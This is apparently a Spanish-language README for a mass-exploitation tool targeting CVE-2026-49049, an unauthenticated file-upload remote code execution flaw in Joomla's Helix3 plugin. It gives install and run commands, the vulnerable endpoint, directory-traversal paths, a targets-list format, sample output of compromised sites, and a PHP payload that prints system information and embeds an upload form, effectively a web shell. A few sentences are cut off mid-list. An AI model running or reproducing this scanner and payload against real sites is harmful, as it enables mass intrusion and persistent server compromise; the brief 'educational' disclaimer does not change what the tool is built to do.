
Escáner masivo de vulnerabilidades para CVE-2026-49049 – Ejecución Remota de Código no autenticada en el plugin Helix3 de Joomla. Multihilo, detecta payloads PHP ejecutados y crudos.
Escáner masivo de vulnerabilidades para CVE-2026-49049: ejecución remota de código sin autenticación en el framework Helix3 de Joomla.
Esta herramienta comprueba múltiples sitios Joomla en busca de la vulnerabilidad CVE-2026-49049 encontrada en el plugin Helix3. La vulnerabilidad permite a un atacante no autenticado subir y ejecutar código PHP arbitrario en el servidor objetivo.
El escáner intenta:
com_ajax con el plugin helix3.requestspip install requests
🛠 Instalación
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 Uso
python2 cve-2026-49049.py targets.txt
Formato de entrada
Cada línea de targets.txt debe contener un dominio o una IP:
example.com
https://example.com
http://192.168.1.100
Archivos de salida
Archivo Descripción results.txt URLs vulnerables donde se ejecutó el payload rez.txt URLs donde se subió el payload pero no se ejecutó (raw PHP)
Ejemplo de salida
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ Configuración
Puedes ajustar las siguientes variables dentro del script:
Variable Valor por defecto Descripción THREADS 20 Número de hilos concurrentes PATHS ['../../../', '../../../../'] Rutas de traversal de directorios TIMEOUT 5 Tiempo de espera (timeout) de las peticiones HTTP RESULT_FILE 'results.txt' Archivo de salida para sitios vulnerables RAW_RESULT_FILE 'rez.txt' Archivo de salida para sitios con raw PHP
🧠 Cómo funciona
El script envía una petición POST a:
/index.php?option=com_ajax&plugin=helix3&format=json
con un payload que:
Luego comprueba si el archivo es accesible y si el código PHP se ejecuta o simplemente se muestra como texto plano.
Ejemplo de payload
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ Descargo de responsabilidad
Esta herramienta es solo para fines educativos y de pruebas autorizadas.
El uso no autorizado de esta herramienta contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal. El autor no es responsable de ningún uso indebido ni de los daños causados por esta herramienta.
Para más descargos de responsabilidad, puedes ver el aviso en la portada de Jenderal92. Puedes consultarlo AQUÍ !!!